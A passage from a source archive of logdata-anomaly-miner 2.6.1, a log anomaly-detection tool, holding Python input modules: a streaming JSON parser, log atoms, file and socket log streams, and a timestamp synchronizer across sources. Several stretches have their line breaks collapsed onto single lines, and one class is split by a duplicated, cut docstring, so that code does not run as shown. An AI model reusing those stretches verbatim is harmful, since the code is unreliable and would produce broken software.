    def get_file_descriptor(self):
        """Get the file descriptor of this open resource."""

    @abc.abstractmethod
    def fill_buffer(self):
        """
        Fill the buffer data of this resource.

        The repositioning information is not updated, update_position() has to be used.
        @return the number of bytes read or -1 on error or end.
        """

    @abc.abstractmethod
    def update_position(self, length):
        """Update the positioning information and discard the buffer data afterwards."""

    @abc.abstractmethod
    def get_repositioning_data(self):
        """Get the data for repositioning the stream. The returned structure has to be JSON serializable."""

    @abc.abstractmethod
    def close(self):
        """Close this logdata resource. Data access methods will not work any more afterwards."""
JsonStateMachine.py000066400000000000000000000222151437606560100340420ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input
# DISCLAIMER: adapted code from
# https://stackoverflow.com/questions/6886283/how-i-can-i-lazily-read-multiple-json-values-from-a-file-stream-in-python
# A streaming byte oriented JSON parser. Feed it a single byte at a time and
# it will emit complete objects as it comes across them. Whitespace within and
# between objects is ignored. This means it can parse newline delimited JSON.
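import math


def json_machine(emit, next_func=None):  # skipcq: PY-D0003
    """
    Build a byte-at-a-time JSON value parser.

    The returned callable accepts one integer byte and returns the callable to feed the next byte to, or None when the byte
    cannot continue a valid value. Complete values are reported through emit(value). At top level (next_func is None) only
    JSON objects are accepted as values; nested parsers (arrays, object members) pass their continuation as next_func.
    @param emit callback receiving each complete value.
    @param next_func state to continue with after a value, or None for the top-level parser.
    @return the initial state function.
    """
    def _value(byte_data):  # skipcq: PY-D0003
        if not byte_data:
            return None
        if byte_data in (0x09, 0x0a, 0x0d, 0x20):
            return _value  # Ignore whitespace
        # only allow json objects in our case
        if byte_data != 0x7b and next_func is _value:
            return None
        if byte_data == 0x22:  # "
            return string_machine(on_value)
        if byte_data in (0x2b, 0x2d) or (0x30 <= byte_data < 0x3a):  # -, + or 0-9
            return number_machine(byte_data, on_number)
        if byte_data == 0x7b:  # {
            return object_machine(on_value)
        if byte_data == 0x5b:  # [
            return array_machine(on_value)
        if byte_data == 0x74:  # t
            return constant_machine(TRUE, True, on_value)
        if byte_data == 0x66:  # f
            return constant_machine(FALSE, False, on_value)
        if byte_data == 0x6e:  # n
            return constant_machine(NULL, None, on_value)
        if next_func is _value:
            return None
        # Not a value start: let the enclosing container decide (e.g. ',' or a closing bracket).
        return next_func(byte_data)

    def on_value(value):  # skipcq: PY-D0003, PTC-W0065
        emit(value)
        return next_func

    def on_number(number, byte):  # skipcq: PY-D0003, PTC-W0065
        # Numbers have no terminator of their own; the byte that ended the number is re-dispatched here.
        emit(number)
        return _value(byte)

    next_func = next_func or _value
    return _value


TRUE = [0x72, 0x75, 0x65]
FALSE = [0x61, 0x6c, 0x73, 0x65]
NULL = [0x75, 0x6c, 0x6c]


def constant_machine(bytes_data, value, emit):  # skipcq: PY-D0003
    """
    State machine matching the remaining bytes of a literal (true/false/null) whose first byte was already consumed.

    @param bytes_data the expected remaining bytes.
    @param value the Python value emitted once all bytes matched.
    @param emit continuation receiving value.
    @return the initial state function; a mismatching byte yields None.
    """
    i = 0
    length = len(bytes_data)

    def _constant(byte_data):  # skipcq: PY-D0003
        nonlocal i
        if byte_data != bytes_data[i]:
            i += 1
            return None
        i += 1
        if i < length:
            return _constant
        return emit(value)

    return _constant


def string_machine(emit):  # skipcq: PY-D0003
    """
    State machine for a JSON string whose opening quote was already consumed.

    Handles backslash escapes including \\uXXXX, decodes multi-byte UTF-8 sequences and rejects ASCII control characters
    other than a raw newline.
    @param emit continuation receiving the decoded str.
    @return the initial state function.
    """
    string = ""
    # Single-character escapes: the byte after the backslash maps to the character it stands for.
    simple_escapes = {0x22: '"', 0x5c: '\\', 0x2f: '/', 0x62: "\b", 0x66: "\f", 0x6e: "\n", 0x72: "\r", 0x74: "\t"}

    def _string(byte_data):  # skipcq: PY-D0003
        nonlocal string
        if byte_data == 0x22:  # "
            return emit(string)
        if byte_data == 0x5c:  # \
            return _escaped_string
        if byte_data & 0x80:  # UTF-8 handling
            return utf8_machine(byte_data, on_char_code)
        if byte_data < 0x20 and byte_data != 0xa:  # ASCII control character - \n is allowed
            return None
        string += chr(byte_data)
        return _string

    def _escaped_string(byte_data):  # skipcq: PY-D0003, PTC-W0065
        nonlocal string
        if byte_data == 0x75:  # u
            return hex_machine(on_char_code)
        replacement = simple_escapes.get(byte_data)
        if replacement is None:
            return None
        string += replacement
        return _string

    def on_char_code(char_code):  # skipcq: PY-D0003, PTC-W0065
        nonlocal string
        string += chr(char_code)
        return _string

    return _string


# Nestable state machine for UTF-8 Decoding.
def utf8_machine(byte_data, emit):  # skipcq: PY-D0003
    """
    Decode one multi-byte UTF-8 sequence starting with the given lead byte.

    @param byte_data the lead byte (already consumed by the caller).
    @param emit continuation receiving the decoded code point as int.
    @return the state function for the continuation bytes, or None for an invalid lead byte.
    """
    left = 0
    num = 0

    def _utf8(byte_data):  # skipcq: PY-D0003
        nonlocal num, left
        if (byte_data & 0xc0) != 0x80:
            return None
        left = left - 1
        num |= (byte_data & 0x3f) << (left * 6)
        if left:
            return _utf8
        # Lead bytes 0xf5..0xf7 can encode values above U+10FFFF; chr() raises ValueError on those, which would escape
        # from the parser on malformed input. Treat them as a parse failure instead.
        if num > 0x10ffff:
            return None
        return emit(num)

    if 0xc0 <= byte_data < 0xe0:  # 2-byte UTF-8 Character
        left = 1
        num = (byte_data & 0x1f) << 6
        return _utf8
    if 0xe0 <= byte_data < 0xf0:  # 3-byte UTF-8 Character
        left = 2
        num = (byte_data & 0xf) << 12
        return _utf8
    if 0xf0 <= byte_data < 0xf8:  # 4-byte UTF-8 Character
        left = 3
        num = (byte_data & 0x07) << 18
        return _utf8
    return None


# Nestable state machine for hex escaped characters
def hex_machine(emit):  # skipcq: PY-D0003
    """
    Parse the four hex digits of a \\uXXXX escape.

    @param emit continuation receiving the 16-bit value as int.
    @return the initial state function; a non-hex byte yields None.
    """
    left = 4
    num = 0

    def _hex(byte_data):  # skipcq: PY-D0003
        nonlocal num, left
        if 0x30 <= byte_data < 0x3a:
            i = byte_data - 0x30
        elif 0x61 <= byte_data <= 0x66:
            i = byte_data - 0x57
        elif 0x41 <= byte_data <= 0x46:
            i = byte_data - 0x37
        else:
            return None
        left -= 1
        num |= i << (left * 4)
        if left:
            return _hex
        return emit(num)

    return _hex


def number_machine(byte_data, emit):  # skipcq: PY-D0003
    """
    Parse a JSON number starting with the given byte.

    The number ends at the first byte that cannot continue it; that byte is handed to emit together with the value so the
    caller can re-dispatch it. A leading zero may only be followed by '.', an exponent marker, a closing bracket/brace, a
    comma or whitespace, which rejects forms like 01.
    @param byte_data the first byte of the number (sign or digit).
    @param emit continuation called as emit(value, terminating_byte).
    @return the next state function.
    """
    sign = 1
    number = 0
    decimal = 0
    esign = 1
    exponent = 0
    dividend = 10
    start_with_zero = False
    # Bytes allowed directly after a leading zero: . E e } ] , \t \n \r Space
    after_zero = (0x2e, 0x45, 0x65, 0x7d, 0x5d, 0x2c, 0x09, 0x0a, 0x0d, 0x20)

    def _mid(byte_data):  # skipcq: PY-D0003
        if start_with_zero and byte_data not in after_zero:
            return None
        if byte_data == 0x2e:  # .
            return _decimal
        return _later(byte_data)

    def _number(byte_data):  # skipcq: PY-D0003
        nonlocal number
        if 0x30 <= byte_data < 0x3a:
            number = number * 10 + (byte_data - 0x30)
            return _number
        return _mid(byte_data)

    def _start(byte_data):  # skipcq: PY-D0003
        nonlocal start_with_zero
        if byte_data == 0x30:
            start_with_zero = True
            return _mid
        if 0x30 < byte_data < 0x3a:
            return _number(byte_data)
        return None

    def _decimal(byte_data):  # skipcq: PY-D0003
        nonlocal decimal, dividend
        if 0x30 <= byte_data < 0x3a:
            decimal += (byte_data - 0x30) / dividend
            dividend *= 10
            return _decimal
        return _later(byte_data)

    def _later(byte_data):  # skipcq: PY-D0003, PTC-W0065
        if byte_data in (0x45, 0x65):  # E e
            return _esign
        return _done(byte_data)

    def _esign(byte_data):  # skipcq: PY-D0003, PTC-W0065
        nonlocal esign
        if byte_data == 0x2b:  # +
            return _exponent
        if byte_data == 0x2d:  # -
            esign = -1
            return _exponent
        return _exponent(byte_data)

    def _exponent(byte_data):  # skipcq: PY-D0003
        nonlocal exponent
        if 0x30 <= byte_data < 0x3a:
            exponent = exponent * 10 + (byte_data - 0x30)
            return _exponent
        return _done(byte_data)

    def _done(byte_data):  # skipcq: PY-D0003, PTC-W0065
        value = sign * (number + decimal)
        if exponent:
            value *= math.pow(10, esign * exponent)
        return emit(value, byte_data)

    if byte_data == 0x2d:  # -
        sign = -1
        return _start
    if byte_data == 0x2b:  # +
        return _start
    return _start(byte_data)


def array_machine(emit):  # skipcq: PY-D0003
    """
    State machine for a JSON array whose opening bracket was already consumed.

    @param emit continuation receiving the completed list.
    @return the initial state function.
    """
    array_data = []

    def _array(byte_data):  # skipcq: PY-D0003
        if byte_data == 0x5d:  # ]
            return emit(array_data)
        return json_machine(on_value, _comma)(byte_data)

    def on_value(value):  # skipcq: PY-D0003
        array_data.append(value)

    def _comma(byte_data):  # skipcq: PY-D0003
        if byte_data in (0x09, 0x0a, 0x0d, 0x20):
            return _comma  # Ignore whitespace
        if byte_data == 0x2c:  # ,
            return json_machine(on_value, _comma)
        if byte_data == 0x5d:  # ]
            return emit(array_data)
        return None

    return _array


def object_machine(emit):  # skipcq: PY-D0003
    """
    State machine for a JSON object whose opening brace was already consumed.

    Duplicate keys keep the last value, as with a plain dict assignment.
    @param emit continuation receiving the completed dict.
    @return the initial state function.
    """
    object_data = {}
    key = None

    def _object(byte_data):  # skipcq: PY-D0003
        if byte_data == 0x7d:  # }
            return emit(object_data)
        return _key(byte_data)

    def _key(byte_data):  # skipcq: PY-D0003
        if byte_data in (0x09, 0x0a, 0x0d, 0x20):
            return _object  # Ignore whitespace
        if byte_data == 0x22:
            return string_machine(on_key)
        return None

    def on_key(result):  # skipcq: PY-D0003, PTC-W0065
        nonlocal key
        key = result
        return _colon

    def _colon(byte_data):  # skipcq: PY-D0003
        if byte_data in (0x09, 0x0a, 0x0d, 0x20):
            return _colon  # Ignore whitespace
        if byte_data == 0x3a:  # :
            return json_machine(on_value, _comma)
        return None

    def on_value(value):  # skipcq: PY-D0003, PTC-W0065
        object_data[key] = value

    def _comma(byte_data):  # skipcq: PY-D0003
        if byte_data in (0x09, 0x0a, 0x0d, 0x20):
            return _comma  # Ignore whitespace
        if byte_data == 0x2c:  # ,
            return _key
        if byte_data == 0x7d:  # }
            return emit(object_data)
        return None

    return _object
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogAtom.py000066400000000000000000000035401437606560100322640ustar00rootroot00000000000000
"""
This module defines a log atom.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .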
"""


class LogAtom:
    """This class defines a log atom used for parsing."""

    def __init__(self, raw_data, parser_match, atom_time, source):
        """
        Create a log atom from scratch.

        @param raw_data the raw bytes of the atom.
        @param parser_match the ParserMatch for the atom or None while it is unparsed.
        @param atom_time the default timestamp of the atom or None.
        @param source the component the atom originates from.
        """
        self.raw_data = raw_data
        self.parser_match = parser_match
        self.atom_time = atom_time
        self.source = source

    def get_parser_match(self):
        """
        Get the parser match associated with this LogAtom.

        @return the match or None for (yet) unparsed LogAtoms.
        """
        return self.parser_match

    def set_timestamp(self, timestamp):
        """
        Replace the default timestamp of this LogAtom.

        May be called repeatedly, e.g. by analysis filters that fine-adjust the timestamp after the initial parsing procedure.
        @param timestamp the new timestamp value.
        """
        self.atom_time = timestamp

    def get_timestamp(self):
        """
        Get the default timestamp value for this LogAtom.

        @return the timestamp as number of seconds since 1970.
        """
        return self.atom_time

    def is_parsed(self):
        """Check whether a parser match is attached to this atom."""
        return not (self.parser_match is None)
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input/LogStream.py000066400000000000000000000436521437606560100326270ustar00rootroot00000000000000
"""
This module contains interfaces and classes for logdata resource handling and combining them to resumable virtual LogStream objects.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see .
""" import base64 import errno import hashlib import os import socket import stat import sys import logging from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.util import SecureOSFunctions from aminer.util.StringUtil import encode_byte_string_as_string from aminer.input.InputInterfaces import LogDataResource class FileLogDataResource(LogDataResource): """ This class defines a single log data resource using an underlying file accessible via the file descriptor. The characteristics of this type of resource is, that reopening and repositioning of the stream has to be possible. """ def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None): """ Create a new file type resource. @param log_resource_name the unique name of this source as bytes array, has to start with "file://" before the file path. @param log_stream_fd the stream for reading the resource or -1 if not yet opened. @param repositioning_data if not None, attempt to position the stream using the given data. """ if not log_resource_name.startswith(b'file://'): msg = 'Attempting to create different type resource as file' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.log_resource_name = log_resource_name self.log_file_fd = log_stream_fd self.stat_data = None if self.log_file_fd >= 0: self.stat_data = os.fstat(log_stream_fd) self.buffer = b'' self.default_buffer_size = default_buffer_size self.total_consumed_length = 0 # Create a hash for repositioning. There is no need to be cryptographically secure here: if upstream can manipulate the content, # to provoke hash collisions, correct positioning would not matter anyway. 
# skipcq: PTC-W1003, BAN-B324 self.repositioning_digest = hashlib.md5() if (log_stream_fd != -1) and (repositioning_data is not None): if repositioning_data[0] != self.stat_data.st_ino: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, inode number mismatch' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) elif repositioning_data[1] > self.stat_data.st_size: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file size too small' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) else: # skipcq: PTC-W1003, BAN-B324 hash_algo = hashlib.md5() length = repositioning_data[1] while length != 0: block = None if length < default_buffer_size: block = os.read(self.log_file_fd, length) else: block = os.read(self.log_file_fd, default_buffer_size) if not block: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, file shrunk while' \ f' reading' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) break hash_algo.update(block) length -= len(block) digest = hash_algo.digest() if length == 0: if digest == base64.b64decode(repositioning_data[2]): # Repositioning is OK, keep current digest and length data. self.total_consumed_length = repositioning_data[1] self.repositioning_digest = hash_algo else: msg = f'Not attempting to reposition on {encode_byte_string_as_string(self.log_resource_name)}, digest changed' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print(msg, file=sys.stderr) length = -1 if length != 0: # Repositioning failed, go back to the beginning of the stream. os.lseek(self.log_file_fd, 0, os.SEEK_SET) def open(self, reopen_flag=False): """ Open the given resource. @param reopen_flag when True, attempt to reopen the same resource and check if it differs from the previously opened one. 
@raise Exception if valid log_stream_fd was already provided, is still open and reopen_flag is False. @raise OSError when opening failed with unexpected error. @return True if the resource was really opened or False if opening was not yet possible but should be attempted again. """ if not reopen_flag and (self.log_file_fd != -1): msg = 'Cannot reopen stream still open when not instructed to do so' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) log_file_fd = -1 stat_data = None try: log_file_fd = SecureOSFunctions.secure_open_file(self.log_resource_name[7:], os.O_RDONLY) stat_data = os.fstat(log_file_fd) except OSError as openOsError: msg = f'OSError occurred in FileLogDataResource.open(). Error message: {openOsError}' logging.getLogger(DEBUG_LOG_NAME).error(msg) if log_file_fd != -1: os.close(log_file_fd) if openOsError.errno == errno.ENOENT: return False raise if not stat.S_ISREG(stat_data.st_mode) and not stat.S_ISFIFO(stat_data.st_mode): os.close(log_file_fd) msg = f'Attempting to open non-regular file {encode_byte_string_as_string(self.log_resource_name)} as file' print(msg, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if reopen_flag and (self.stat_data is not None) and (stat_data.st_ino == self.stat_data.st_ino) and ( stat_data.st_dev == self.stat_data.st_dev): # Reopening was requested, but we would reopen the file already opened, which is of no use. os.close(log_file_fd) return False # This is a new file or a successful reopen attempt. self.log_file_fd = log_file_fd self.stat_data = stat_data return True def get_resource_name(self): """Get the name of this log resource.""" return self.log_resource_name def get_file_descriptor(self): """Get the file descriptor of this open resource.""" return self.log_file_fd def fill_buffer(self): """ Fill the buffer data of this resource. The repositioning information is not updated, update_position() has to be used. 
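# --- remainder of class FileLogDataResource; its header and open() precede this span ---
    def fill_buffer(self):
        """
        Read the next chunk of the file into the internal buffer.

        The repositioning information is not updated here; update_position() has to be called once data was consumed.
        @return the number of bytes read. os.read() returns 0 at end of file (or when a growing file has no new data yet)
        and raises OSError on failure, so this implementation never produces -1 although the interface allows it.
        """
        chunk = os.read(self.log_file_fd, self.default_buffer_size)
        self.buffer += chunk
        return len(chunk)

    def update_position(self, length):
        """
        Mark the first length bytes of the buffer as consumed.

        The bytes are folded into the repositioning digest and added to total_consumed_length before being dropped.
        """
        consumed = self.buffer[:length]
        self.repositioning_digest.update(consumed)
        self.total_consumed_length += length
        self.buffer = self.buffer[length:]

    def get_repositioning_data(self):
        """
        Get the data for repositioning the stream: [inode, consumed byte count, base64 digest of the consumed data].

        The returned structure has to be JSON serializable. NOTE(review): base64.b64encode() returns bytes, not str, so
        the encoder used by the persistence layer must accept bytes -- confirm against the caller.
        """
        digest_b64 = base64.b64encode(self.repositioning_digest.digest())
        return [self.stat_data.st_ino, self.total_consumed_length, digest_b64]

    def close(self):
        """Close the log file and invalidate the descriptor."""
        os.close(self.log_file_fd)
        self.log_file_fd = -1


class UnixSocketLogDataResource(LogDataResource):
    """
    This class defines a single log data resource connecting to a local UNIX socket.

    The characteristics of this type of resource is, that reopening works only after end of stream was reached.
    """

    # skipcq: PYL-W0231, PYL-W0613
    def __init__(self, log_resource_name, log_stream_fd, default_buffer_size=1 << 16, repositioning_data=None):
        """
        Create a new unix socket type resource.

        @param log_resource_name the unique name of this source as byte array, has to start with "unix://" before the socket path.
        @param log_stream_fd the stream for reading the resource or -1 if not yet opened.
        @param default_buffer_size the maximum number of bytes read per fill_buffer() call.
        @param repositioning_data accepted for interface compatibility only; a socket stream cannot be repositioned, so the
        value is ignored and get_repositioning_data() always returns None.
        @raise Exception when log_resource_name does not carry the "unix://" prefix.
        """
        if not log_resource_name.startswith(b'unix://'):
            msg = 'Attempting to create different type resource as unix'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        self.log_resource_name = log_resource_name
        self.log_stream_fd = log_stream_fd
        self.buffer = b''
        self.default_buffer_size = default_buffer_size
        self.total_consumed_length = 0

    def open(self, reopen_flag=False):
        """
        Open the given resource by connecting to the UNIX socket.

        @param reopen_flag when True, attempt to reopen the same resource; as a socket cannot be compared to the previous
        connection, reopening is only possible once the previous stream was closed.
        @raise Exception if a valid log_stream_fd was already provided, is still open and reopen_flag is False.
        @raise OSError when connecting failed with an error other than ENOENT or ECONNREFUSED.
        @return True if the resource was really opened or False if opening was not yet possible but should be attempted again.
        """
        if reopen_flag:
            # Still connected: nothing to do until end of stream closed the descriptor.
            if self.log_stream_fd != -1:
                return False
        elif self.log_stream_fd != -1:
            msg = 'Cannot reopen stream still open when not instructed to do so'
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise Exception(msg)
        log_socket = None
        try:
            log_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            log_socket.connect(self.log_resource_name[7:])
        except OSError as socket_error:
            # socket.error is an alias of OSError on Python 3: it carries .errno/.strerror but has no .msg attribute and
            # no item access, so the previous `socketError.msg` / `socketError[0]` forms crashed inside this handler.
            logging.getLogger(DEBUG_LOG_NAME).error(
                "OSError occurred in UnixSocketLogDataResource.open(). Error message: %s", socket_error)
            if log_socket is not None:
                log_socket.close()
            # Socket not created yet or nobody listening: tell the caller to retry later.
            if socket_error.errno in (errno.ENOENT, errno.ECONNREFUSED):
                return False
            # Already an OSError, which is what callers expect; re-raise unchanged.
            raise
        # Keep only a duplicated raw descriptor; the socket object itself is not needed for os.read().
        self.log_stream_fd = os.dup(log_socket.fileno())
        log_socket.close()
        return True

    def get_resource_name(self):
        """Get the name of this log resource."""
        return self.log_resource_name

    def get_file_descriptor(self):
        """Get the file descriptor of this open resource, or -1 when not connected."""
        return self.log_stream_fd

    def fill_buffer(self):
        """
        Read the next chunk from the socket into the internal buffer.

        The repositioning information is not updated here; update_position() has to be called once data was consumed.
        @return the number of bytes read; os.read() returns 0 at end of stream and raises OSError on failure.
        """
        chunk = os.read(self.log_stream_fd, self.default_buffer_size)
        self.buffer += chunk
        return len(chunk)

    def update_position(self, length):
        """Account for length consumed bytes and drop them from the buffer."""
        self.total_consumed_length += length
        self.buffer = self.buffer[length:]

    # skipcq: PYL-R0201
    def get_repositioning_data(self):
        """Sockets cannot be repositioned, so there is no repositioning data (None)."""
        return None

    def close(self):
        """Close the log stream and invalidate the descriptor."""
        os.close(self.log_stream_fd)
        self.log_stream_fd = -1


class LogStream:
    """
    This class defines a continuous stream of logging data from a given source.

    This class also handles rollover from one file descriptor to a new one.
    """

    def __init__(self, log_data_resource, stream_atomizer):
        """
        Create a new logstream with an initial log_data_resource.

        @param log_data_resource the resource to read first; may be None when no resource is active yet.
        @param stream_atomizer the atomizer to forward data to.
        """
        # The resource currently processed. Might also be None when previous resource was read till end and no rollover
        # to a new one had occurred.
        self.log_data_resource = log_data_resource
        self.stream_atomizer = stream_atomizer
        # Last reading state, same meaning as the StreamAtomizer consume_data() return value. 0 means "more data required".
        self.last_consume_state = 0
        # Resources queued for rollover, in order.
        self.next_resources = []

    def add_next_resource(self, next_log_data_resource):
        """
        Roll over from one fd to another one pointing to the newer version of the same file.

        The resource is queued; the next read that yields no data from the current resource picks it up automatically. When
        no resource is active at all, the new one becomes active immediately.
        """
        if self.log_data_resource is None:
            self.log_data_resource = next_log_data_resource
        else:
            self.next_resources.append(next_log_data_resource)

    def handle_stream(self):
        """
        Handle data from this stream by forwarding it to the atomizer.

        @return the file descriptor to monitor for new input or -1 if there is no new data or the atomizer was not yet ready
        to consume data. Handling should be tried again later on.
        """
        resource = self.log_data_resource
        if resource is None:
            return -1
        if self.last_consume_state == 0:
            # The atomizer asked for more data last round, so read some.
            read_length = resource.fill_buffer()
            if read_length == 0 and not self.next_resources:
                # No input and nothing to roll over to. A blocking stream would not have called us, so this is the
                # preliminary end of the file: keep last_consume_state, tell the caller to wait and retry.
                return -1
            # -1 is the interface's error/end marker; 0 with a queued resource means EOF for rollover.
            if read_length in (-1, 0):
                self.last_consume_state = self.roll_over()
                return self.last_consume_state
        # Data is available (freshly read or left over from the previous round); let the atomizer consume it.
        self.last_consume_state = self.stream_atomizer.consume_data(resource.buffer, False)
        if self.last_consume_state < 0:
            return -1
        if self.last_consume_state != 0:
            resource.update_position(self.last_consume_state)
        return resource.get_file_descriptor()

    def roll_over(self):
        """
        End reading of the current resource and switch to the next.

        This method does not handle last_consume_state, that has to be done outside.
        @return state in the same manner as handle_stream().
        """
        resource = self.log_data_resource
        consumed_length = self.stream_atomizer.consume_data(resource.buffer, True)
        if consumed_length < 0:
            # Consumer is not ready to consume yet. Retry later on.
            return -1
        buffered_length = len(resource.buffer)
        if consumed_length != buffered_length:
            if consumed_length != 0:
                # Some data consumed, unclear why not all when already at end of stream. Retry immediately to find out why.
                resource.update_position(consumed_length)
                return resource.get_file_descriptor()
            # Clear protocol violation (see StreamAtomizer documentation): at EOF, 0 is not a valid return value.
            msg = f'Procotol violation by {self.stream_atomizer.__class__.__name__} detected, flushing data'
            logging.getLogger(DEBUG_LOG_NAME).critical(msg)
            print('FATAL: ' + msg, file=sys.stderr)
            consumed_length = buffered_length
        # Everything consumed, so now ready for rollover.
        resource.update_position(consumed_length)
        resource.close()
        if not self.next_resources:
            self.log_data_resource = None
            return -1
        self.log_data_resource = self.next_resources.pop(0)
        return self.log_data_resource.get_file_descriptor()

    def get_current_fd(self):
        """Get the file descriptor for reading the currently active log_data resource, or -1 when none is active."""
        if self.log_data_resource is None:
            return -1
        return self.log_data_resource.get_file_descriptor()

    def get_repositioning_data(self):
        """Get the repositioning information from the currently active underlying log_data resource, or None when none is active."""
        if self.log_data_resource is None:
            return None
        return self.log_data_resource.get_repositioning_data()

    def close(self):
        """Close the currently active log_data resource, if any."""
        if self.log_data_resource is not None:
            self.log_data_resource.close()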
""" from aminer.input.InputInterfaces import AtomizerFactory from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer class SimpleByteStreamLineAtomizerFactory(AtomizerFactory): """ This factory just creates the same atomizer for each new resource. All parsed and unparsed atoms are delivered via two lists of handlers. """ def __init__( self, parsing_model, atom_handler_list, event_handler_list, default_timestamp_path_list=None, eol_sep=b'\n', json_format=False): """ Create the factory to forward data and events to the given lists for each newly created atomizer. @param default_timestamp_path_list if not empty list, the value of this timestamp field is extracted from parsed atoms and stored as default timestamp for that atom. """ self.parsing_model = parsing_model self.atom_handler_list = atom_handler_list self.event_handler_list = event_handler_list if default_timestamp_path_list is None: self.default_timestamp_path_list = [] else: self.default_timestamp_path_list = default_timestamp_path_list self.eol_sep = eol_sep self.json_format = json_format def get_atomizer_for_resource(self, resource_name): # skipcq: PYL-W0613 """ Get an atomizer for a given resource. @param resource_name the resource name for atomizer selection is ignored in this type of factory. @return a StreamAtomizer object """ return ByteStreamLineAtomizer(self.parsing_model, self.atom_handler_list, self.event_handler_list, 1 << 16, self.default_timestamp_path_list, self.eol_sep, self.json_format) SimpleMultisourceAtomSync.py000066400000000000000000000134321437606560100360070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/input""" This module defines a handler that synchronizes different streams. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. 
import time

from aminer.input.InputInterfaces import AtomHandlerInterface


class SimpleMultisourceAtomSync(AtomHandlerInterface):
    """
    Synchronize several atom streams so that atoms are forwarded in timestamp order across sources.

    Only the source currently holding the oldest pending atom may forward; atoms without a timestamp pass immediately. A source
    that delivers nothing for sync_wait_time seconds is dropped from the bookkeeping, which lets the atoms blocked on the other
    sources through.
    """

    def __init__(self, atom_handler_list, sync_wait_time=5):
        """
        @param atom_handler_list forward atoms to all handlers in the list, no matter if the log_atom was handled or not.
        @param sync_wait_time seconds to wait for the other sources before a silent source is considered exhausted.
        """
        self.atom_handler_list = atom_handler_list
        self.sync_wait_time = sync_wait_time
        # Last forwarded log atom timestamp (kept for compatibility; not updated in this class).
        self.last_forward_timestamp = 0
        # Active sources: source -> [largest timestamp forwarded from it, pending LogAtom or None].
        self.sources_dict = {}
        # Start in blocking mode so that every source gets a chance to submit an atom before the first one is forwarded.
        self.blocking_end_time = time.time() + self.sync_wait_time
        self.blocking_sources = 0
        self.timestamps_unsorted_flag = False
        self.last_forwarded_source = None
        self.buffer_empty_counter = 0

    def receive_atom(self, log_atom):
        """
        Receive a log atom from a source.

        @return True as soon as forwarding was attempted, no matter if one downstream handler really consumed the atom; False
        when the atom has to be offered again later.
        """
        source = log_atom.source
        # Right after forwarding from one source, prefer that source for a bounded number of turns before accepting others.
        if self.last_forwarded_source is not None and source != self.last_forwarded_source \
                and self.buffer_empty_counter < 2 * len(self.sources_dict):
            self.buffer_empty_counter += 1
            return False
        self.buffer_empty_counter = 0
        self.last_forwarded_source = None

        timestamp = log_atom.atom_time
        if timestamp is None:
            # Nothing to order by: pass it through.
            return self._forward_and_remember(log_atom)

        own_info = self.sources_dict.get(source)
        if own_info is None:
            own_info = [timestamp, log_atom]
            self.sources_dict[source] = own_info
        elif timestamp < own_info[0]:
            # Atoms not sorted, not our problem. Forward it immediately.
            self.timestamps_unsorted_flag = True
            return self._forward_and_remember(log_atom)
        elif own_info[1] is None:
            own_info[1] = log_atom

        # Find the source with the oldest pending atom and note whether any source has nothing pending.
        oldest_info = None
        has_idle_sources_flag = False
        for info in self.sources_dict.values():
            if info[1] is None:
                has_idle_sources_flag = True
            elif oldest_info is None or info[1].atom_time < oldest_info[1].atom_time:
                oldest_info = info

        if self.blocking_end_time != 0:
            # We cannot do anything while blocking to catch more atoms.
            if self.blocking_end_time > time.time():
                return False
            # Blocking has expired: sources that stayed idle are considered exhausted.
            for expired in [src for src, info in self.sources_dict.items() if info[1] is None]:
                del self.sources_dict[expired]
            self.blocking_end_time = 0
            self.blocking_sources = 0
            has_idle_sources_flag = False

        if has_idle_sources_flag:
            # Before entering blocking state, give all other sources the chance to submit an atom.
            if self.blocking_sources == len(self.sources_dict):
                self.blocking_end_time = time.time() + self.sync_wait_time
            else:
                self.blocking_sources += 1
            return False

        # No idle sources: forward only if this atom is the oldest pending one.
        if log_atom != oldest_info[1]:
            return False
        self.forward_atom(log_atom)
        self.last_forwarded_source = source
        oldest_info[1] = None
        if timestamp > oldest_info[0]:
            oldest_info[0] = timestamp
        self.blocking_sources = 0
        return True

    def _forward_and_remember(self, log_atom):
        """Forward the atom unconditionally and record its source as the last forwarded one."""
        self.forward_atom(log_atom)
        self.last_forwarded_source = log_atom.source
        return True

    def forward_atom(self, log_atom):
        """Forward atom to all atom handlers."""
